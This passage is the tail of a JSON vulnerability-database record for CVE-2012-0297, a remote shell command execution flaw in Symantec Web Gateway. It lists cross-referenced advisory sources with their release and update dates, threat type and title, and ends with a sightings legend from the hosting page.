        "db": "PACKETSTORM",
        "id": "114231"
      },
      {
        "db": "PACKETSTORM",
        "id": "113446"
      },
      {
        "db": "PACKETSTORM",
        "id": "112876"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-0297"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "ZDI",
        "id": "ZDI-12-090",
        "ident": null
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-53578",
        "ident": null
      },
      {
        "db": "BID",
        "id": "53444",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "114231",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "113446",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "112876",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2012-0297",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2012-06-08T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-090",
        "ident": null
      },
      {
        "date": "2012-05-21T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-2638",
        "ident": null
      },
      {
        "date": "2012-05-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-53578",
        "ident": null
      },
      {
        "date": "2012-05-17T00:00:00",
        "db": "BID",
        "id": "53444",
        "ident": null
      },
      {
        "date": "2012-05-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-002472",
        "ident": null
      },
      {
        "date": "2012-06-27T14:25:28",
        "db": "PACKETSTORM",
        "id": "114231",
        "ident": null
      },
      {
        "date": "2012-06-09T02:28:10",
        "db": "PACKETSTORM",
        "id": "113446",
        "ident": null
      },
      {
        "date": "2012-05-18T05:24:51",
        "db": "PACKETSTORM",
        "id": "112876",
        "ident": null
      },
      {
        "date": "2012-05-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201205-332",
        "ident": null
      },
      {
        "date": "2012-05-21T20:55:17.727000",
        "db": "NVD",
        "id": "CVE-2012-0297",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2012-06-08T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-090",
        "ident": null
      },
      {
        "date": "2012-05-21T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-2638",
        "ident": null
      },
      {
        "date": "2017-12-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-53578",
        "ident": null
      },
      {
        "date": "2012-06-28T12:10:00",
        "db": "BID",
        "id": "53444",
        "ident": null
      },
      {
        "date": "2012-05-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-002472",
        "ident": null
      },
      {
        "date": "2012-05-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201205-332",
        "ident": null
      },
      {
        "date": "2024-11-21T01:34:44.793000",
        "db": "NVD",
        "id": "CVE-2012-0297",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "113446"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "Symantec Web Gateway Remote Shell Command Execution Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638"
      },
      {
        "db": "BID",
        "id": "53444"
      }
    ],
    "trust": 0.9
  },
  "type": {
    "_id": null,
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…